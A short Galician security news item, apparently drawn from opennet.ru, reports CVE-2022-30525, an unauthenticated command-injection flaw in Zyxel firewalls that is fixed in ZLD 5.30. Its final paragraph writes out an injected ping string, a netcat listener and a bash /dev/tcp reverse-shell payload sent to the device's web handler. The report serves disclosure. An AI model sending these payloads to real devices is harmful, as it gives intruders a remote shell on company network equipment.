Identificouse unha vulnerabilidade crítica (CVE-2022-30525) nos dispositivos Zyxel das series ATP, VPN e USG FLEX, deseñados para organizar o funcionamento de cortalumes, IDS e VPN nas empresas, que permite a un atacante externo executar código no dispositivo sen dereitos de usuario sen autenticación. Para levar a cabo un ataque, un atacante debe poder enviar solicitudes ao dispositivo mediante o protocolo HTTP/HTTPS. Zyxel solucionou a vulnerabilidade na actualización do firmware ZLD 5.30. Segundo o servizo Shodan, actualmente hai 16213 dispositivos potencialmente vulnerables na rede global que aceptan solicitudes a través de HTTP/HTTPS.
A operación realízase enviando comandos especialmente deseñados ao controlador web /ztp/cgi-bin/handler, accesible sen autenticación. O problema é causado pola falta de limpeza adecuada dos parámetros de solicitude ao executar comandos no sistema mediante a chamada os.system utilizada na biblioteca lib_wan_settings.py e executada ao procesar a operación setWanPortSt.
Por exemplo, un atacante podería pasar a cadea “; ping 192.168.1.210;" o que levará á execución do comando “ping 192.168.1.210” no sistema. Para acceder ao shell de comandos, pode executar “nc -lvnp 1270” no seu sistema e, a continuación, iniciar unha conexión inversa enviando unha solicitude ao dispositivo co '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Fonte: opennet.ru